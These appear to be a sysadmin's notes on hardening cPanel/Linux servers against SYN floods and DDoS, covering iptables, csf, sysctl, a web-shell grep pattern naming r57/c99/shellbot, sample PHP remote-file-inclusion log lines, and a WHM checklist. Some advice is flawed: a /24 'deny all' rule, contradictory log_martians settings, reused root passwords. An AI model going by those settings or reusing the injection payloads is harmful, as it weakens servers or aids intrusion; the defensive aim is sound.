Iptables rule to allow access only from one IP

iptables -I INPUT -s (allowip) -p tcp –dport (port) -j ACCEPT

iptables -A INPUT -s 0.0.0.0/24 -p tcp –dport (port) -j DROP

Drop Sync/DDOS Attack

1. Find.. to which IP address in the server is targeted by the ddos attack

netstat -plan  | grep  :80 | awk ‘{print $4}’ | cut -d: -f1 |sort |uniq -c

2. Find… from which IPs, the attack is coming

netstat -plan  | grep  :80 | awk ‘{print $5}’ | cut -d: -f1 |sort |uniq -c

In csf:

vi /etc/csf/csf.conf

SYNFLOOD is disabled by default. If you are not receiving any sort of attack, there is no need to enable it. If you are expecting an attack, enable it and set the rules a bit strict, like

SYNFLOOD_RATE = “5/s”

SYNFLOOD_BURST = “3”

my eg:

SYNFLOOD = “1”

SYNFLOOD_RATE = “30/s”

SYNFLOOD_BURST = “10”

SYNFLOOD

SYNFLOOD is disabled by default. If you are not receiving any sort of attack, there is no need to enable it. If you are expecting an attack, enable it and set the rules a bit strict, like

SYNFLOOD = “1”

SYNFLOOD_RATE = “30/s”

SYNFLOOD_BURST = “10”

i.e. if 30 connections are received from an IP/sec for 10 times, block it. Make sure don’t keep it too strict if you are not receiving an attack else it will generate false positives and will block legit connections.

PORTFLOOD

PORTFLOOD = 80;tcp;100;5,22;tcp;5;300

ie, If an IP makes 100 connections in 5 sec to port 80 (tcp), then it will be blocked from the server and if 5 connections in 300 sec to 22 port.

In /etc/sysctl.conf

Paste the following into the file, you can overwrite the current information.

#Kernel sysctl configuration file for Red Hat Linux

#

# For binary values, 0 is disabled, 1 is enabled. See sysctl(8) and

# sysctl.conf(5) for more details.

# Disables packet forwarding

net.ipv4.ip_forward=0

# Disables IP source routing

net.ipv4.conf.all.accept_source_route = 0

net.ipv4.conf.lo.accept_source_route = 0

net.ipv4.conf.eth0.accept_source_route = 0

net.ipv4.conf.default.accept_source_route = 0

# Enable IP spoofing protection, turn on source route verification

net.ipv4.conf.all.rp_filter = 1

net.ipv4.conf.lo.rp_filter = 1

net.ipv4.conf.eth0.rp_filter = 1

net.ipv4.conf.default.rp_filter = 1

# Disable ICMP Redirect Acceptance

net.ipv4.conf.all.accept_redirects = 0

net.ipv4.conf.lo.accept_redirects = 0

net.ipv4.conf.eth0.accept_redirects = 0

net.ipv4.conf.default.accept_redirects = 0

# Enable Log Spoofed Packets, Source Routed Packets, Redirect Packets

net.ipv4.conf.all.log_martians = 0

net.ipv4.conf.lo.log_martians = 0

net.ipv4.conf.eth0.log_martians = 0

# Disables IP source routing

net.ipv4.conf.all.accept_source_route = 0

net.ipv4.conf.lo.accept_source_route = 0

net.ipv4.conf.eth0.accept_source_route = 0

net.ipv4.conf.default.accept_source_route = 0

# Enable IP spoofing protection, turn on source route verification

net.ipv4.conf.all.rp_filter = 1

net.ipv4.conf.lo.rp_filter = 1

net.ipv4.conf.eth0.rp_filter = 1

net.ipv4.conf.default.rp_filter = 1

# Disable ICMP Redirect Acceptance

net.ipv4.conf.all.accept_redirects = 0

net.ipv4.conf.lo.accept_redirects = 0

net.ipv4.conf.eth0.accept_redirects = 0

net.ipv4.conf.default.accept_redirects = 0

# Disables the magic-sysrq key

kernel.sysrq = 0

# Decrease the time default value for tcp_fin_timeout connection

net.ipv4.tcp_fin_timeout = 15

# Decrease the time default value for tcp_keepalive_time connection

net.ipv4.tcp_keepalive_time = 1800

# Turn off the tcp_window_scaling

net.ipv4.tcp_window_scaling = 0

# Turn off the tcp_sack

net.ipv4.tcp_sack = 0

# Turn off the tcp_timestamps

net.ipv4.tcp_timestamps = 0

# Enable TCP SYN Cookie Protection

net.ipv4.tcp_syncookies = 1

# Enable ignoring broadcasts request

net.ipv4.icmp_echo_ignore_broadcasts = 1

# Enable bad error message Protection

net.ipv4.icmp_ignore_bogus_error_responses = 1

# Log Spoofed Packets, Source Routed Packets, Redirect Packets

net.ipv4.conf.all.log_martians = 1

# Increases the size of the socket queue (effectively, q0).

net.ipv4.tcp_max_syn_backlog = 1024

# Increase the tcp-time-wait buckets pool size

net.ipv4.tcp_max_tw_buckets = 1440000

# Allowed local port range

net.ipv4.ip_local_port_range = 16384 65536

Run /sbin/sysctl -p and sysctl -w net.ipv4.route.flush=1 to enable the changes without a reboot.

TCP Syncookies

echo 1 > /proc/sys/net/ipv4/tcp_syncookies

Some IPTABLES Rules:

iptables -A INPUT -p tcp –syn -m limit –limit 1/s –limit-burst 3 -j RETURN

iptables -A INPUT -p tcp –syn -m state –state ESTABLISHED,RELATED –dport 80 -m limit –limit 1/s –limit-burst 2 -j ACCEPT

Disable ping to server

To disable ping

echo 1 > /proc/sys/net/ipv4/icmp_echo_ignore_all

To enable ping
echo 0 > /proc/sys/net/ipv4/icmp_echo_ignore_all

Prevent SYN attacks

1. Enable SYN cookies mechanism in the server by the executing command:

# echo 1 > /proc/sys/net/ipv4/tcp_syncookies

2. Increase the backlog queue to 2048 by the command:

# sysctl -w net.ipv4.tcp_max_syn_backlog=”2048″

Script used to correct permission of files after suphp

#!/bin/bash

# For some stupid reason, cPanel screws up the directory permissions.
chmod 755 /opt/suphp
find /opt/suphp -type d -exec chmod 755 {} \;

# Ensure that the permissions are sane and won’t cause a 500 error.
for user in `/bin/ls /var/cpanel/users`; do

chown -R ${user}:${user} /home/${user}/public_html
chmod 755 /home/${user}/public_html
find /home/${user}/public_html -name “*.php” -exec chmod 644 {} \;
find /home/${user}/public_html -type d -exec chmod 755 {} \;

# Comment out Joomla-installed PHP overrides that are not compatible with suPHP.
find /home/${user}/public_html -name ‘.htaccess’ -exec sed -i -e ‘s/php_value/#php_value/’ {} \;
find /home/${user}/public_html -name ‘.htaccess’ -exec sed -i -e ‘s/php_flag/#php_flag/’ {} \;
done

# Delete former session variables due to suPHP no longer having permission to them.
rm -rf /tmp/sess_*

Script used to find vulnerable php files

#!/bin/bash

shellpattern=’r0nin|m0rtix|upl0ad|r57|c99|shellbot|phpshell|void\.ru|phpremoteview|directmail|bash_history|vulnscan|spymeta|raslan58′

for user in `/bin/ls /var/cpanel/users`
do
find /home/$user/public_html \( -name ‘*.php’ -o -name ‘*.cgi’ -o -name ‘*.inc’ \) -exec \
egrep -il “$shellpattern” {} \;
done

To block an IP range using Iptables

iptables -I INPUT -m iprange –src-range 192.168.1.10-192.168.1.13 -j DROP

How to find PHP injection through logs

URL Injection — attempt to inject / load files onto the server via PHP/CGI vulnerabilities

Sample log report including date and time stamp (1st field is “request”, 2nd field is the IP address or the domain name being attacked, and the 3rd field is the IP address or domain name of the attacker)

Request —– IP attacked —— IP of attacker

————————————————————————————————

Request: xxxx.com 111.222.333.444 – – [19/Apr/2009:08:35:02 -0500] “GET /?custompluginfile[]=http://yyyy.com/images/copyright.txt?? HTTP/1.1” 500 3572 “-” “Mozilla/5.0” SesohkAx1jYAAFNIEg0 “-”

Request: xxxx.com 111.222.333.444 – – [19/Apr/2009:08:35:03 -0500] “GET /fanzine/?custompluginfile[]=http://yyyy.com/images/copyright.txt?? HTTP/1.1” 500 3572 “-” “Mozilla/5.0” Sesoh0Ax1jYAAFN@Eng “-”

————————————————————————————————

Drop DDOS attack

1. Find.. to which IP address in the server is targeted by the ddos attack

netstat -plan  | grep  :80 | awk ‘{print $4}’ | cut -d: -f1 |sort |uniq -c

2. Find… from which IPs, the attack is coming

netstat -plan  | grep  :80 | awk ‘{print $5}’ | cut -d: -f1 |sort |uniq -c

3. Then find the TTL values of the attacking IP addresses

tcpdump -nn -vvv host xxxx |grep yyy (xxxx = ip attacking and yyyy = ip being attacked)

usually we need only tcpdump -nn -vvv host xxxx (as attack is coming from numerous ips)

4. Now block all the ips matching the TTL value obtained from the above script

iptables -A INPUT -p tcp -s 0.0.0.0/0 -d yyyy -m ttl –ttl-eq=zzz -j DROP (zzz is the ttl value)

——————————————————————————————————————-

Install mod security and dos evasive

——————————————————————————————————————-

Harden the sysctl parameters (kernel params) to mitigate the current attack.

Increasing the backlog queue size and decreasing the backlog queuing time might help a bit.

——————————————————————————————————————-

Also install an open source script to prevent DDoS attack to certain extend.
http://deflate.medialayer.com/

MediaLayer was in need of a script to automatically mitigate (D)DoS attacks. The necessity started when MediaLayer was the target of a rather large, consistent attack originating from multiple IP addresses. Each IP would have a large amount of connections to the server, as shown as by:

netstat -ntu | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n

It became a general practice for us to be blocking IPs with a large amount of connections, but we wanted to get this automated. Zaf created a script mitigate this kind of attack. We kept improving it to meet our own needs and eventually posted it on Defender Hosting’s Forum. (D)DoS-Deflate is now recognized as one of the best ways to block a (D)DoS attack at the software level.

License Agreement

You can view a copy of the license agreement here.

Installation

wget http://www.inetbase.com/scripts/ddos/install.sh
chmod 0700 install.sh
./install.sh

Uninstalling

wget http://www.inetbase.com/scripts/ddos/uninstall.ddos
chmod 0700 uninstall.ddos
./uninstall.ddo

Reference : http://deflate.medialayer.com/

Preset Cpanel Servers

To preset a server:

First login and go to the WHM > Server Configuration > Basic cPanel/WHM
Setup:

1) Check that the main ip is the server primary ip
2) Make sure that the primary and secondary ns are set to ns1 and ns2 (or
how they had been prior to a reload)
**************************************************************************
Next go to WHM > Server Configuration > Tweak Settings:

Leave all the settings alone…ADD the following:
1) Under Domains: “Prevent users from parking/adding on common
internet domains. (ie hotmail.com, aol.com)”
2) Under Mail: “Attempt to prevent pop3 connection floods”
3) “Default catch-all/default address behavior for new accounts.” Select
‘fail’
4) “Email users when they have reached 80% of their bandwidth”
5) “Include a list of Pop before SMTP senders in the X-PopBeforeSMTP header
when relaying mail. (exim 4.34-30+ required)”
6) “Silently Discard all FormMail-clone requests with a bcc: header in the
subject line”
7) “Track the origin of messages sent though the mail server by adding the
X-Sender headers (exim 4.34+ required)”
Cool Under Software: “Loader to use for internal cPanel PHP” select
‘sourceguardian’
9) Under Status: “The load average that will cause the server status to
appear red (leave blank for default):” >> 5
10) Under System: “Allow Sharing Nameserver Ips”
11) “Use jailshell as the default shell for all new accounts and modified
accounts”

Click save at the bottom
**************************************************************************
Next, WHM > Server Configuration > Update Config:

1) Select ‘Automatic (RELEASE Tree)’
2) Verify that the cPanel Package Update and Security Package Update are
also set to ‘Automatic’
**************************************************************************
Next WHM > Security > Shell Fork Bomb Protection:

1) Enable Protection
**************************************************************************
Next, go to WHM > Security > Tweak Security please enable:

1) Php open_basedir Tweak
2) Compilers Tweak
3) SMTP Tweak
**************************************************************************
Next, WHM > Service Configuration:

1) Exim Configuration editor – enable Verify the existence of email senders

2) FTP configuration – Make sure Anonymous FTP is disabled
3) Nameserver Setup – Be sure that the nameserver is running
4) Service Manager – Check to monitor all EXCEPT the following:
Entropychat, Interchange, Melange, Tomcat and Exim on Another Port
**************************************************************************
Next, WHM > Cluster/Remote Access > Setup Remote Access Key:

1) Connect to SSH (if not already) and run the script:
pico /usr/local/cpanel/Cpanel/rvwhmkey
2) Copy/paste the key into the space provided, click ctrl x to exit, y to
save and hit enter to return to the prompt.

(NOTE: if there is no pico, an alternate method can be used: vi
/usr/local/cpanel/Cpanel/rvwhmkey; then press ‘i’ to insert text; paste
text; hit ‘esc’ to stop inserting text; press ‘:wq’ to save and exit- if you
need to exit without saving- ‘:q!’ will bring you back to prompt)
**************************************************************************
Next, back to WHM > Account Functions > Create a New Account:

1) Create an account with domain ‘rvadmin.com‘, username ‘rvadmin’ and
password of <same as root>
**************************************************************************
Next, WHM > System Health > Background Process Killer:

1) Click all open boxes and save.
**************************************************************************
Next, WHM > cPanel xx.xx.xx > Addon Modules:

1) Click on cPanel Pro, Clamavconnector, Modbandwidth, Modsecurity and
Addonupdates and click ‘save’ to install.
**************************************************************************
Next, WHM > cPanel xx.xx.xx > Addon Scripts:

1) Click all and click ‘save’ to install.
**************************************************************************
Next, WHM > Add-ons:
mod_security